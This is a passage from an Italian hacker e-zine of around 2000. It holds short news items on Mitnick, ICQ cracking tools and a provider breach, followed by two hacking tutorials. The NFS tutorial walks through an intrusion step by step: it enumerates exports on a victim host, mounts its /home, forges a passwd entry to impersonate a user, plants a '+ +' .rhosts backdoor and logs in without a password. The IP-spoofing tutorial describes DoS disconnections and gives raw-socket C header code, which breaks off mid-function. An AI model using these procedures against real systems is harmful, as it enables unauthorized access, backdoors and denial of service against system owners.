sviluppando una complessa rete wireless attraverso cui una serie di 
dispositivi handheld potranno funzionare come "agenti intelligenti", 
in grado di riconoscere i volti e la voce dei suoi utenti.
La grande rivoluzione di questa nuova generazione di computer  
rappresentata dal fatto che i "mezzi" per arrivare a dei risultati non 
verranno pi cercati su di una memoria di massa, bens direttamente su di
una rete di network, con la quale saranno totalmente integrati e dalla 
quale trarranno ogni genere di informazione e risorsa per espletare i 
loro compiti.
Il primo prodotto nato in seno al progetto Oxygen e pensato per il 
mercato consumer sar Handy 21, un handhled dotato di display LCD, 
telecamera e GPS, in grado di interagire con una rete di computer 
chiamati Enviro 21.
Gli Enviro 21 equipaggeranno auto, case, uffici e vari mezzi di 
trasporto, e saranno dotati di sensori, microfoni e telecamere: ognuno 
di essi sar connesso in modo permanente ad una rete chiamata Network 21
da cui attinger ogni genere di risorse.


+--< Mitnick chiede maggiori libert >--+ ]26/06/2000[ Cyberlaw ]

Kevin Mitnick, l'hacker reso celebre dalle sue disavventure giudiziarie 
senza precedenti, torna oggi in tribunale per chiedere la rimozione di 
alcune limitazioni alla propria libert di espressione. Nel dispositivo 
che port alla sua scarcerazione dopo anni di galera, infatti, gli veniva
proibito non solo il contatto con qualsiasi computer ma anche 
l'esprimersi pubblicamente su materie informatiche.
Il problema di Mitnick, dunque, non  solo quello di poter accettare le 
collaborazioni che gli vengono proposte da numerose riviste e giornali 
specializzati in internet e informatica ma anche quello di trovare un 
posto di lavoro. Mitnick non  infatti pi un ragazzino, la sua 
"specializzazione"  ovviamente tecnico-ingegneristica ma le limitazioni
imposte dal tribunale, dice, gli impediscono di guadagnarsi da vivere...
Ad ascoltare l'appello di Mitnick sar il giudice distrettuale Mariana 
R. Pfaelzer, il magistrato che condann l'hacker a 54 mesi di prigione. 
Sul suo giudizio peser senz'altro quanto scritto dal sorvegliante di 
Mitnick, Larry Hawley: "In relazione alle numerose richieste che ha 
ricevuto per scrivere articoli, recensire giornali e parlare a 
conferenze, riteniamo necessario proibire tali attivit e raccomandiamo 
di trovare un posto di lavoro in un settore non collegato al computing".
Va detto che nel recente passato Mitnick  stato ascoltato addirittura 
da una delle Commissioni parlamentari americane che si occupano di 
sicurezza delle infrastrutture informative in qualit di "esperto". 
Una "testimonianza" che giocher probabilmente un ruolo importante 
nell'udienza di oggi.


+--< Bucare ICQ  davvero troppo facile >--+ ]26/06/2000[ Bug ]

"Ci sono pi buchi nella programmazione di ICQ che in Windows98": questa
la descrizione che viene fatta del programma di instant messaging di 
America Online da uno degli innumerevoli siti che propongono softwaretti
e softwarini per mandare in tilt ICQ e i suoi utenti.
S, perch se da sempre la rete  utilizzata da cracker di ogni livello 
per passarsi programmini ad hoc per bucare qu o l, pare proprio che di 
questi tempi ICQ sia diventato un obiettivo preferenziale per un certo 
numero di siti "dedicati al cracking".
Basti pensare che su siti che illustrano tecniche di hacking, phone 
phreaking e via dicendo, ICQ tiene banco con tutto un capitolo di 
approfondimento. 
Questo accade con decine di siti che abbiamo visitato in questi giorni,
tutti densi di elenchi di programmi con cui inviare migliaia di messaggi
contemporaneamente ad un account ICQ, con cui individuare il numero IP 
del computer che usa il sistema scambiamessaggini, con cui mandare in 
tilt e far chiudere ICQ all'utente-vittima.
Ci sono anche programmi meno "aggressivi", come quelli che "si limitano"
a copiare la lista dei contatti di un certo utente ICQ o che permettono
di entrare nella lista di un utente autorizzandosi da s. 
Ci che pi pu preoccupare di questi attacchi, per un utente ICQ che 
passa molte ore collegato alla rete,  la quantit di sistemi di facile 
utilizzo che permettono ad un aggressore di recuperare l'indirizzo IP e 
la porta utilizzata dalla macchina dell'utente. In quel caso, infatti, 
senza volerlo si fornisce una via d'accesso al proprio computer facile 
facile.
Tra l'altro, individuare questi programmi in rete, come dimostra una 
semplice ricerca su un motore, richiede soltanto pochi minuti. Ed  
curioso, di fronte a tutto questo, che solo qualche giorno fa America 
Online, certamente al corrente della cosa, abbia affermato che 
l'incompatibilit dei propri sistemi scambiamessaggi con quelli di altri
produttori  da ascrivere al timore di perdere qualcosa sul lato 
sicurezza. Una gruviera, con qualche buco in pi, rimane sempre una 
gruviera.


+--< RoboHacker testa la sicurezza dei sistemi >--+ ]26/06/2000[ Technology ]

Per collaudare la sicurezza degli ambienti informatici non servir pi 
assoldare team di hacker o di espertoni, n perdere denaro in consulenze 
speciali. Baster servirsi di un robot intelligente: questa la scommessa 
di Sanctum, azienda che ha prodotto un software attacca-sistemi.
Secondo Sanctum, il suo prodotto, RoboHacker,  in grado di compiere 
attacchi mirati ai sistemi da testare, di intervenire sulle configurazioni,
di inviare "cookie avvelenati", di creare buffer overflow. Ma  anche un 
mezzo, sostiene l'azienda, per "prevenire", perch sarebbe in grado di 
scovare codici nascosti, file infilati in un server da terzi e via dicendo.
Una volta eseguiti tutti i tentativi di hacking predisposti, RoboHacker 
offre un report dettagliato che dovrebbe consentire agli amministratori 
di sistema, secondo Sanctum gi euforici per il denaro risparmiato in 
consulenze, di lavorare sulle eventuali vulnerabilit.
La sfida  lanciata, dunque, e ora sono in molti a chiedersi se funzioner. 
In ogni caso sar molto difficile convincere chiunque che un software, per 
quanto evoluto, possa sostituire le capacit e l'esperienza di un 
professionista della sicurezza.


+--< Hacker trova 24mila carte di credito online >--+ ]28/06/2000[ Cyberwar ]

I dati relativi a 24mila carte di credito: questo il bottino che un hacker 
avrebbe potuto prelevare e utilizzare a proprio piacimento se non fosse stato,
appunto, un hacker anzich un cracker. Un ignoto consulente di sicurezza, che
ha informato della cosa il Times di Londra,  entrato nei sistemi del provider
Redhotant e ha catturato, pare con una certa facilit, non solo i dati delle 
carte di credito ma anche nominativi e altri dettagli relativi ai singoli 
utenti del fornitore d'accesso britannico.

L'operazione, a cui il Times ha dato un certo risalto, viene per negata 
dall'azienda secondo cui nessuno avrebbe potuto, dall'esterno, arrivare a 
conoscere dati cos protetti. L' hacker, che sostiene di aver avvertito per 
ben due volte il provider della debolezza dei suoi sistemi prima di passare ai
fatti, ha per specificato il metodo utilizzato per la  "dimostrazione" e ha 
anche comunicato i nomi di alcuni personaggi celebri che sono abbonati al 
provider. 
I sistemi di Redhotant, provider che per 30 sterline l'anno offre accesso 
illimitato pur soffrendo di congestione di banda, sarebbero stati bucati con 
un proxy. 
L' hacker, infatti, ha affermato di essere entrato assumendo l'identit di un
utente e di essere riuscito non solo ad arrivare al database clienti, ma 
anche ad accedere al network interno del provider. "Si  trattato - ha detto 
al Times - di un gioco da ragazzi. Non  stato un hacking tradizionale, in 
quanto non ho avuto bisogno di password,  bastato infatti cercare
una chiave per trovare una porta di ingresso. Il pi grave errore di 
Redhotant  stato di tenere i suoi dati sullo stesso disco e sulla stessa 
macchina utilizzata per i propri servizi".


+--< Italia, pedopornografi abili come hacker? >--+ ]28/06/2000[ Cyberwar ]

"Il luogo di elezione dei pedofili": questa  internet nelle parole del 
Commissario della sezione  antipedofilia della Polizia, Maria Cristina Ascenzi
"Da cinque anni a questa parte - ha denunciato Ascenzi ieri - il fenomeno  
esploso qualitativamente e quantitativamente. 

Chi traffica materiale pornografico o l'adulto in cerca di conoscenze 
infantili ha affinato le sue competenze tecnologiche". Pedopornografi hi-tech?
Pare proprio di s. Secondo il Commissario, chi commette abusi "usa macchine 
sofisticate e sfrutta le potenzialit di segretezza e di collegamenti 
illimitati della rete senza lasciare traccia del suo passaggio".

Una abilit da hacker, dunque, contro cui serve ma non basta la normativa 
antipornografia infantile varata ormai da tempo in Italia e che prende di 
mira non solo il commercio di materiale pedopornografico ma soprattutto il 
commercio che di questi contenuti si fa in rete. 

Secondo Ascenzi la legge "ha fornito nuovi e importanti strumenti di 
investigazione ma c' molto da fare perch il fenomeno incalza". I numeri 
derivati dalle indagini sono piuttosto impressionanti. Negli scorsi due anni 
sarebbero 3.200 i siti, le chat room e i newsgroup monitorati dai cybercops 
italiani, con indagini che hanno coinvolto 232 persone, con l'apertura di 591 
fascicoli e con provvedimenti restrittivi comminati a venti persone. 

Numerose, 421, anche le segnalazioni alle autorit estere. Ma non va tutto 
per il meglio, a sentire Ascenzi, secondo cui "la legge ci permette le 
intercettazioni telematiche, l'acquisto simulato di materiale pornografico, 
la possibilit di ritardare l'esecuzione dei provvedimenti di cattura quando 
sia necessario acquisire rilevanti elementi probatori, ma i fondi per gli 
acquisti simulati sono scarsi, i PC a nostra disposizione molto pi antiquati 
di quelli usati da chi andiamo a contrastare e non tutti i provider registrano
l'utenza chiamante, cio il numero telefonico di chi si collega, mentre altri 
non conservano i tabulati che per poco tempo".

---]CyBOrG[ & The Jackal---

###################################################################
#######  CCC Y   Y BBBB  EEEE RRRR  PPPP  U   U N   N X   X #######
####### C     Y Y  B   B E    R   R P   P U   U NN  N  X X  #######
####### C      Y   BBBB  EEE  RRRR  PPPP  U   U N N N   X   #######
####### C      Y   B   B E    R R   P     U   U N  NN  X X  #######
#######  CCC   Y   BBBB  EEEE R  RR P      UUU  N   N X   X #######
###################################################################


----------------------------------------------------------------[ HacKinG ]---
===] VULNERABILITA' IN NFS ]==================================================
========] Montarsi sulla propria macchina un intero server [==================
-----[ Vulcan ]---------------------------------------------------------------

              .......::'''''|_ _v u l c a n_ _|'''''::........
                       ^^^^^                   ^^^^^


Buongiorno, allora, la mia collaborazione con AiS mi ha spinto, anche nel
nuovo numero, a partorire qualcosa di informe e malefico, qualkosa che non
dara' scampo anche all'amministratore di sistema pi evoluto.

Naturalmente l'articolo  rivolto sopratutto agli smanettoni della rete e a 
coloro che vogliono addentrarsi nei meandri delle tecniche di utilizzo dei
sistemi non documentate.
Se invece siete amministratori di sistema vi potr servire per controllare 
la configurazione del vostro sistema e dei servizi che avete in rete e che 
incautamente lasciate a disposizione  delle menti malate come me.

In realt le tecniche descritte in questo articolo non le ho mica inventate
o partorite io, esistendo gi da diverso tempo. Ma siccome qualkuno di voi
pu anche non saperne niente e magari si sta svegliando solo ora dal 
cyberletargo, allora mi sono deciso a scrivere due righe.

Stiamo parlando di NFS cio network file system. NFS  un servizio creato da
SUN microsystem con lo scopo di rendere disponibili in rete i filesystem dei
pc unix.
Il tutto funziona tramite il comando mount....si lo stesso con cui linux 
'monta' il floppy ed il cdrom dentro la dir /mnt specifica, solo che in questo
caso verr montata sulla vostra macchina una directory del filesystem vittima
o tutto il filesystem se siete fortunati.

In pratica consente l'accesso al filesystem di un sistema remoto come fosse
davanti a voi, o meglio come se fosse in una vostra directory.
Ripetendovi che come al solito non sono responsabile delle cazzate che 
farete vi invito a controllarvi e ad evitare di fare stronzate in puro stile
lamers.

Non fate mai danni quando provate qualkosa su un sistema remoto! Se davvero
il vostro scopo e' fare dei danni allora lasciate perdere di leggere questo 
articolo.
In ogni caso io non mi ritengo responsabile per ci che combinerete e quello 
che state leggendo ha esclusivamente uno scopo conoscitivo e didattico.

Allora vediamo di iniziare.

Cosa vi serve?

- 1 - Un PC di qualunque tipo. (cosa? non lo avete? ma che cazzo dite? e
      come state leggendo?)

- 2 - Linux installato sulla macchina. (non importa la versione del kernel,
      certo se avete l'ultima non beta, il 2.2.14 meglio per voi.)

- 3 - Sapere digitare qualcosa sulla tastiera.(Hey se non avete nemmeno la
      tastiera allora siete proprio delle pecore...)

- 4 - Vi serve avviare linux come root in quanto, dopo avere importato sul
      nostro 'pinguino' il filesystem remoto, bisogner fare delle 
      operazioni ammissibili solo ad utenti con privilegi di root.

Si vi serve linux, ma pu andare bene anche una qualsiasi shell, 
naturalmente se soddisfa le condizioni di sopra, sopratutto a livello di
possesso di un account root. Bene al lavoro allora.

NFS  arrivato oggi alla versione 3 ed  implementato in quasi tutte le
distribuzioni di UNIX. La possibilit di portare un attacco da remoto a 
questo servizio non  per automatica. La corretta configurazione di NFS
prevede che solo alcuni host autorizzati possano accedervi, ma spesso
l'ignoranza in materia di alcuni amministratori di sistema produce cazzate
grandi quanto na casa, per cui l'intero filesystem spesso  esportabile a
chiunque ne faccia richiesta.

Ricapitoliamo, NFS ed il suo server mountd devono essere
configurati in maniera errata, per essere vulnerabili, consentendo 
l'esportazione
delle directory o dell'intero filesystem del server vittima a chiunque.
Allora voi vi chiederete: ma io come faccio a sapere se NFS di un server 
vittima
e configurato male?
Ecco questa  una buona domanda. Procediamo con ordine per. Allora alcuni
amministratori di sistema pi cazzuti degli altri hanno ben pensato di 
aliminare
il servizio dai loro server in quanto pericoloso per la sicurezza.
Altri, giustamente pi pignoli lo hanno lasciato, ma configurandolo in 
maniera
corretta.
Ma ora passiamo alla pratica. Visto quello che abbiamo detto, la prima cosa
da fare  controllare se NFS  un servizio che gira sulla macchina vittima.
Mettiamo che la nostra vittima sia il server 'hostvittima.it'.
Per controllare che il sevizio  attivo usiamo:


[root@localhost /root]# rpcinfo -p hostvittima.it


Spero che sappiate che la parte da scrivere  solo quella dopo il #.
A questa richiesta il sistema remoto risponder, ad esempio, in questo modo:


program   vers   proto    port

100000    3      tcp      111   rcpbind
100000    2      tcp      111   rcpbind
100000    1      tcp      111   rcpbind
100000    3      udp      111   rcpbind
100000    2      udp      111   rcpbind
100000    1      udp      111   rcpbind
100005    1      tcp    32811   mountd
100005    2      tcp    32811   mountd
100005    3      tcp    32811   mountd
100005    1      udp    32870   mountd
100005    2      udp    32870   mountd
100005    3      udp    32870   mountd
100003    1      udp     2049   nfs
100003    2      udp     2049   nfs
100003    3      udp     2049   nfs

Questo comando ci da in pratica l'elenco dei servizi rpc disponibili,
comprensivo di numero del processo, porta, protocollo utilizzato e
nome che identifica il servizio.
Bene cerchiamo di fare mente locale ora. Nel server  implementato il 
mountd,
ed il servizio nfs sembra attivo. Esiste in pratica la possibilit che
qualche directory sia esportabile o meglio ancora tutte le directory!
Andiamo a controllare usando un altro comando della shell di quello
stupendo sistema operativo che  linux.


[root@localhost /root]# showmount -e hostvittima.it


Questo comandino  moooolto importante. Vi dar infatti un risultato
variabile da cui saprete se  possibile attuare un mount sulla vostra
macchina o meno. Vediamo pi in dettaglio il risultato.


/
/home   (everyone)
/usr    (everyone)
/bin    (everyone)


Ecco questo  un tipico caso di server NFS configurato male. A questo
punto potete cantare vittoria. Come vedete tutto l'intero filesystem
(la directory radice /)  esportabile a chiunque (everyone). Indipercui
potrete montarvi tutto il filesystem sul vostro caro linux...hehehe.
Bene per far cio prima di tutto dobbiamo creare una cartella che lo
contenga, questo benedetto filesystem remoto. La creeremo pertanto
all'interno della directory /mnt, e la chiameremo come ci piace....
io, nell'esempio l'ho chiamata 'box'.
Usiamo il comando mkdir (make dir)e creiamola allora.........


[root@localhost /root]# mkdir /mnt/box


ok se ora andiamo a controllare dentro la dir /mnt ne troveremo una
nuova che si chiama 'box' appunto e due vecchie, quelle di default
'cdrom' e 'floppy'.
Benone ci siamo? Possiamo continuare? ok.......
Passiamo ora all'operazione vera e propria, cio quella di 'montare il
fylesystem'. A tale scopo utilizziamo un altro comando di linux che
si chiama 'mount' lo conoscete no? Credo che se avete avuto a che fare
con il floppy o col cdrom lo conosciate sicuro. Comunque per coscienza
personale vi do qualche informazione dopo.
Intanto introduciamo il comando............


[root@localhost /root]# mount -nt nfs hostvittima.it:/direxportabile 
/mnt/box


Allora piccola spiegazione dentro /direxportabile mettete semplicemente
il path della directory esportabile che abbiamo trovato precedentemente
col comando showmount, vi ricordate? Andate a rivedere un po pi su.....
Bene, ad esempio vogliamo montarci la dir /home del server www.megasys.net?
( solo un esempio! nemmeno esiste) nulla di pi semplice.....


[root@localhost /root]# mount -nt nfs megasys.net:/home /mnt/box


a noi interessa particolarmente la dir /home e poi vedremo il perche.
Ok credo che possa bastare come esempio. Ricordatevi sempre che quello
che possiamo montare, che inseriremo come parametro nel comando mount
lo ricavate dalle informazioni che vi fornisce showmount ok?
Ora facciamo na breve parentesi su mount visto le continue richieste
di gente via email a cui non funzionano i floppy di win su linux...

			I M P O R T A N T E
_________________________________________________________________________
LA PARENTESI NON RIGUARDA L'ARTICOLO MA PENSO SIA MOLTO UTILE LO STESSO

Allora molti mi chiedono come mai i loro floppy di windows non vengono
letti da linux, che invece rileva un errore berbacco!
Eccovi spiegato. Linux  in grado di leggere quasi tutti i formati di file
usati anche da windows(lasciate perdere gli .exe per) .txt .jpeg ma ha
bisogno, per farlo, che gli venga detto che la formattazione  di tipo
FAT diversa pertanto da quella di linux, che  linux/native hehehe.
E come glie lo spieghiamo al nostro linux? Facile.......
Allora quando eseguite il mount di un dispositivo quale ad esempio il
floppy dovrete specificare un parametro di riconoscimento e cio vfat.
Passiamo ad un esempio pratico. Montiamo un FLOPPY di WINDOWS...

[root@localhost /root]# mount /dev/fd0 /mnt/floppy -t vfat

ed ecco che magicamente il floppy viene montato......ooooohhhh!
Oppure se siamo proprio megalomani, possiamo montare tutto l'hard
disk dove si trova windows.....prima per create sempre una cartella
che lo contenga con # mkdir /mnt/hard

[root@localhost /root]# mount /dev/hda1 /mnt/hard -t vfat

Avrete tutto l'hard disk a disposizione coi dati di windowssss!!!!
Naturalmente mi sto riferendo al caso abbiate entrambi i S.O. su due
partizioni dello stesso hard disk!
OK parentesi chiusa.

		   P A R E N T E S I  C H I U S A
_______________________________________________________________________

Completiamo il discorso su NFS allora?
Perfetto.
Allora dopo il comando dato,.....


[root@localhost /root]# mount -nt nfs megasys.net:/home /mnt/box


ci ritroviamo con un intero server, appunto megasys.net, e tutte le sue
directory montate sulla nostra linux box. Che fare ora? Lavoriamo un poco
sul file delle password! che ne dite? Inseriamo nel nostro file delle pass
un utente che si trova nel sistema importato in questo modo ci garantiremo
un accesso in maniera 'furbesca' diciamo. Non ci state capendo nulla? lo so
 colpa mia ma con un esempio pratico capirete.
Spostiamoci nella dir dove si trova il server che ci siamo importati e
vediamo un poco cosa c'!


[root@localhost /root]#cd /mnt/box
[root@localhost /root]#ls -lh


sapete a cosa serve ls -lh vero? no? ok  un comando di enumerazione di file
e directory di linux diciamo che  l'equivalente di dir. Comunque se non
conoscete questi comandi fondamentali io vi consiglio prima di trovarvi una
buona guida o manuale che dirsivoglia e studiarveli un poco.
Torniamo a noi, ecco l'immediata e pronta risposta della nostra shell!


drwxr-xr-x   3 322      other        1024 Jan  3 03:25 vespro
drwxr-xr-x   2 93       other         512 Oct 15 08:45 Valk
drwxr-xr-x  11 207      other         512 Feb  8 17:00 |KillAll|
drwxr-xr-x   2 321      other         512 Oct 27 06:15 _vulcan_
drwxr-xr-x   6 news     news          512 Mar  6  2000 news
drwxr-xr-x   2 linux    other         512 Jan 24 04:17 CyBoRg
drwxr-xr-x   4 opman    other         512 Sep 28 06:16 Mfonzie
drwxr-xr-x   3 turbo    other        2048 Mar  1 10:25 CRACKNET
drwxr-xr-x   2 82       other         512 Feb 12 07:45 machoman
drwxr-xr-x   5 68       other         512 Feb  1 15:00 alfredo
drwxr-xr-x   5 45       other         512 Oct 27 01:15 sysad


ecco cosa contiene la directory /home del server. Naturalmente i nomi 
potranno
essere molti di pi, ma questo non  importante. Qual' il nostro scopo? 
Creare
nel nostro passwd file(di cui vi ricordo il percorso /etc/passwd) un utente
uguale ad uno di quelli che vediamo nella directory home del server. Mi 
spiego
meglio. Avendo nel nostro file password(quello del nostro linux) un utente
uguale a quello del sistema bersaglio avremo accesso alla sua directory, 
dopo
alcuni smanettamenti. Ok? Perfetto. Prendiamo no sfigato qualsiasi tipo
_vulcan_ e segnamoci il suo numero utente che  321. Ora andiamo a creare
un nuovo utente nel nostro file delle password. Apriamolo in modalit
grafica, con l'editor standard di linux o con un editor tipo vi o pico e
aggiongiamo una nuova riga nuova:


_vulcan_::x:3215:5::/home:/bin/sh


con questa riga abbiamo inserito nel nostro file password un accesso con
shell all'utente _vulcan_, la shell  quella standard "sh" ma possiamo anche
assegnargli una bella bash se vogliamo. Da questo momento avremo accesso
alla home directory di _vulcan_!  nostra! che facciamo ora? dobbiamo
immettere un doppio "+ +" all'interno del file .rhost della dir home di
_vulcan_, in questo modo possiamo entrare ed uscire dal sistema senza 
fornire
una password....hhehehehe.... la nostra backdoor classica.


[root@localhost /root]#echo + +>>_vulcan_/.rhosts


Spiegazione del comando: "echo" - cio un ordine di scrivere i due "+ +",
dove? dentro ">>" _vulcan_ e nel file .rhost che vi ricordo  un file
nascosto. In linux tutti i file o le dir che iniziano col . sono nascosti.
Perfetto abbiamo finito. Ora potremo accedere al sistema con il comando
"rlogin" che si usa appunto in associazione ad un file .rhost per accedere
senza password.


[root@localhost /root]#rlogin -l_vulcan_ megasys.net

SCO Openserver 5 January 2000
Last login: Sat Jan 21 12:16:36 from albacom.net
you have mail.
>$_


OK abbiamo finito ora siamo dentro, possiamo metterci qualke backdoor pi
evoluta certo ma le cose di base le abbiamo fatte. Il resto sta tutto alla
vostra fantasia! Potrete prendervi il file delle password ad esempio e poi
decrittarlo allegramente con john the ripper o applicarci qualke exploit in
locale. Insomma ormai il buco lo avete trovato....ed il sistema  vostro!
Se siete buoni mandate una email all'amministratore di sistema e lo
avvertite del suo problema. Se siete intelligenti vi sperimenterete tutto
quanto solo sulla vostra macchina e cercherete di capire il funzionamento
di NFS in locale, cercando di configurarlo in modo da rendere /home
esportabile a qualsivoglia utente. Infine se siete cattivi cazzi vostri...
....io sono buono! hehehehehehe

Se avete domande, problemi oppure ho scritto qualke cazzata siete pregati
di correggermi all'email vulcan12mm@hotmail.com indicando nell'oggetto
"email per vulcan", questo perch nella mailing list di AiS ci sono ogni
giorno decine di messaggi ed io non posso leggermeli tutti!
Un ultima cosa. Vulcan  un modello mitragliatrice multicanna a rotazione
di costruzione americana non  un vulcano, per cui in IRC evitate se potete
di chiamarmi Vesuvio, Etna... uno mi ha chiamato persino Everest..vedi tu
l'ignoranza, .....mah.... hahahahhahaha ciao

---Vulcan---

----------------------------------------------------------------[ HacKinG ]---
===] ATTACCHI AL TCP/IP ]=====================================================
-----[ Davser ]---------------------------------------------------------------
                                                                             
Info: davser@tin.it - http://davser.cjb.net - ICQ 19930061

Questo articolo e' una raccolta di testi sull'attacco al TCP/IP oltre a 
qualcosa di mio. Ho attinto da varie riviste, libri, ecc. quindi non mailatemi
dicendo che avete gia' letto queste cose da altre parti! 

OK, cominciamo...

Il protocollo TCP/IP, dalla sua comparsa ad oggi, e' stato analizzato dal 
punto di vista della sicurezza, delle performance, dell'ottimizzazione e degli
stati indefiniti in maniera molto profonda. Nel corso del tempo varie 
vulnerabilita' sono state scoperte, sia nel protocollo in se', che nelle varie
implementazioni disponibili (ossia gli stack TCP/IP dei sistemi operativi)

Tuttavia, una implementazione ben pensata del TCP/IP, e' ancora in grado di 
fornire buoni livelli di sicurezza nel caso in cui siano state prese tutte le 
precauzioni necessarie.

****L'IP spoofing attack*****

Per chi si avvicina al mondo della sicurezza, l'attacco conosciuto come 
"IP spoofing" e' spesso fonte di confusione. L'equivoco sta nel fatto che col 
termine "IP spoofing" si indicano due attacchi distinti: il primo consiste 
nello spedire dei pacchetti IP aventi l'indirizzo sorgente contraffatto, 
l'altro nell'utilizzo del primo attacco per costruirne uno piu' complesso, 
conosciuto come "blind spoofing", ovvero spoofing alla cieca. Qui vedremo in 
dettaglio il primo dei due attacchi. 

L'IP spoofing e' una tecnica che consiste nell'inviare dei pacchetti
opportunamente 'modificati' per far credere al destinatario, che gli stessi 
arrivino da tutt'altra parte e, quindi, per rendersi 'anonimi' (o meglio 
spacciarsi per qualcun altro) agli occhi della "vittima". Questo si ottiene 
modificando l'indirizzo IP sorgente(source IP) nell' header (intestazione) del
pacchetto (datagramma IP). L'IP spoofing viene utilizzato per molti attacchi 
sia di tipo D.o.S. (Denial of Service, attacchi che possono mettere fuori uso,
bloccare o rallentare il sistema momentaneamente... fastidioso ma non provoca 
danni gravi), sia per il tipico Hacking (attacchi molto piu' interessanti che 
possono permettere di guadagnare particolari accessi nei sistemi) e utilizzato
sia in modo diretto (attaccando cioe' direttamente il sistema che riceve i 
pacchetti spoofati), sia in modo indiretto (sfruttando cioe' le risposte che 
la macchina destinataria dello spoof invia al presunto mittente). 

Gli attacchi D.o.S. che si possono realizzare cmq sono molti: dai vari flood 
(syn flood, rst flood) al click, al boink ecc. Oppure, se proprio si vuole 
avere la comunicazione bilaterale, si potrebbe tentare di instaurarla alla 
ceca, cercando di prevedere le varie risposte della vittima ai nostri 
pacchetti, e rispondendo a nostra volta in modo adeguato (assicurandoci pero' 
che l'IP da noi spoofato sia in quel momento irraggiungibile e non possa 
quindi rispondere anche lui alla vittima (che, sta inviando pacchetti 
all'indirizzo da noi spoofato). 

Uno schemino chiaro che riassume l'IP spoofing (e si trova su praticamente 
tutti i documenti che trattano IP spoofing), e' all'incirca questo:

host A <---------------->X<--------------> host B
                         | 
host S  ---------------->/


in cui: noi siamo host S, il bersaglio del nostro attacco e' host B e il e 
l'indirizzo sorgente che metteremo nell'header dei pacchetti al posto del 
nostro, corrisponde al'indirizzo di host A. 
Come si puo' realizzare lo spoofing? Be' per farvi un idea, un  programma che 
lo realizza e che probabilmente avrete utilizzato qualche volta e' il famoso 
Click della 7th sphere...  che fa esattamente questo: Ipotizziamo un tipico 
attacco D.o.S. da lamer in IRC. Secondo lo schemino che c'e' li sopra: se noi 
siamo host S e vogliamo disconnettere host B dal server IRC host A (un server 
a caso irc.tin.it hihihi) che facciamo? Impostiamo il Click con i giusti dati 
e scegliamo tra il modo client side oppure server side, quindi  lanciamo 
l'attacco. Mettiamo di aver scelto l'attacco client side.... 
Succede che il Click comincia a mandare a host B pacchetti ICMP spoofati 
aventi come indirizzo sorgente host A (server IRC) e come contenuto una frase 
del tipo "Sono Esploso!!". ("host unreachable") Host B (vittima) a questo 
punto riceve questa 'lettera/pacchetto' proveniente da Host A (server IRC), 
legge il messaggio e realizza che host A (server IRC) e' esploso ..  quindi 
pensa: "che cavolo ci rimango connesso a fare a un indirizzo di server che non
c'e' piu' perche' e' esploso?" a questo punto si disconnette. L'attacco e' 
realizzato, host B e' disconnesso da IRC. Nel caso avessimo scelto il modo di 
attacco server side, il procedimento e' uguale ma i pacchetti vengono mandati 
a host A (server IRC) e provenienti da host B (vittima), quindi e' il server 
IRC che scollega host B credendolo 'esploso'. Questo e' solo un esempio di 
attacco. In effetti, sfruttare appieno l'IP spoofing (anche per cercare di 
far qualcosa; in piu' dei tipici D.o.S.), significa soprattutto potersi 
costruire i pacchetti da inviare, su misura.. a seconda del tipo di attacco 
che vogliamo realizzare. Questo risulta piu' facile da ottenere ad esempio su 
sistemi Linux che su Winzozz 9x, pero' per questi ultimi potreste utilizzare 
programmi appositi (ad esempio exploit generator) che funzionano abbastanza 
bene.

Come si fa a mandare un pacchetto spoofato?

Beh, ci sono modi e modi. Da Unix & Company e' molto facile: basta creare un 
socket RAW (un socket *molto* grezzo) e lavorarlo mettendoci sopra degli 
header IP e TCP (ma anche UDP o ICMP) non standard, cioe' come quelli che si 
trovano nelle librerie net*. Infatti, nel nostro header IP dovremmo mettere 
anche l'ip del mittente, cosa che invece con le normali funzioni di sending 
viene automaticamente fatta dal protocollo usato.

In principio si crea un bell'header ip tipo:

struct ipheader {
  unsigned char verlen, tos; //versione+lunghezza header, tipo
  unsigned short lenght, identification, flageoffset; //lunghezza, id, 
       							flags+offset
  unsigned char ttl, protocol; //time to live, protocollo utilizzato
  unsigned long int source, destination; //indirizzo ip sorgente, destinazione
};

ecco, bello vero?
Se esaminate attentamente vedrete:

  * un char (8 bit) che include sia la versione ip che la lunghezza
    dello header (contenitori a 4 bit non li so trovare io in c...)

  * un char (8 bit) per il tipo di servizio (TOS)

  * uno short (16 bit) per la lunghezza, uno per l'identificazione e uno che
    include i 3 bit dei flag e i 13 del fragment offset

  * un altro char per il time to live, ovvero su quanti server pu passare 
    prima di fermarsi

  * un altro char che identifica il protocollo

  * due long (32 bit) che identificano l'ip sorgente e quello di destinazione

Per agevolarci ora creeremo uno pseudo ip header:

struct pseudoipheader {
  unsigned long int source, destination;
  char byte_zero, protocol;
  unsigned short TCP_UDP_lenght;
};

qui abbiamo l'ip sorgente, destinazione, il byte zero, il protocollo
utilizzato e la lunghezza del tcp o dell'udp.
Ora veniamo ai protocolli TCP e UDP:

struct tcpheader {
  unsigned short source, destination;
  unsigned long int seq, ack;
  unsigned short offset_flags, window, checksum, urgent;
};

da notare che i source e i destination sono non degli indirizzi, ma delle 
porte (short a 16 bit), qui dovete mettere la porta sorgente e quella 
destinazione, insomma. Poi c'e' il SEQ e l'ACK, interi a 32 bit, e infine 
abbiamo l'header lenght + reserved + flags, window, il checksum e l'urgent 
pointer. Ecco qui anche quello dell'udp, giusto per facilitarvi la vita :)

struct udpheader {
  unsigned short source, destination, lenght, checksum;
}
Tutto chiaro no? E per finire si crea uno struct di scambio di dati spoofati, 
anche questo per facilitarci la vita...

struct spdataexchange {
  int fd;
  char *data;
  int datalen;
  char *source;
  unsigned short sourceport;
  char *destination;
  unsigned short destinationport;
  unsigned long seq, ack;
  unsigned short flags;
  char *buffer;
  int ip_optlen, tcp_optlen;
}

In questo struct copieremo i dati ip e tcp e tutto il resto, per poi scriverlo
sul pacchetto da inviare... Ora, come facciamo ad inviare un pacchetto??? 
Creeremo una funzione detta sendsppacket:

void sendsppacket(struc spdataexchange *sp, unsigned char protcollo)
{
  int sp_status;
  struct sockaddr_in *sp_serv;
  struct hostent *sp_help;
  int HEADER_BASE;
  bzero((char *)&sp_serv, sizeof(struct sockaddr));
  sp_serv.sin_family = AF_INET;
  sp_serv.sin_addr.s_addr = inet_addr(sp->destination);
  if(sp_serv.sin_addr.s_addr==(unsigned int)-1)
  {
    if(!(sp_help=gethostbyname(sp->destination)))
      fprintf(stderr,"unknown host %s\n",sp->destination), exit(1);
    bcopy(sp_help->h_addr,(caddr_t)&sp_serv.sin_addr,sp_help->h_lenght);
  }
  switch(protocollo)
  {
    case TCP: HEADER_BASE = TCP_HEADER_BASE; break; //Spiego sotto questi 
						      passaggi
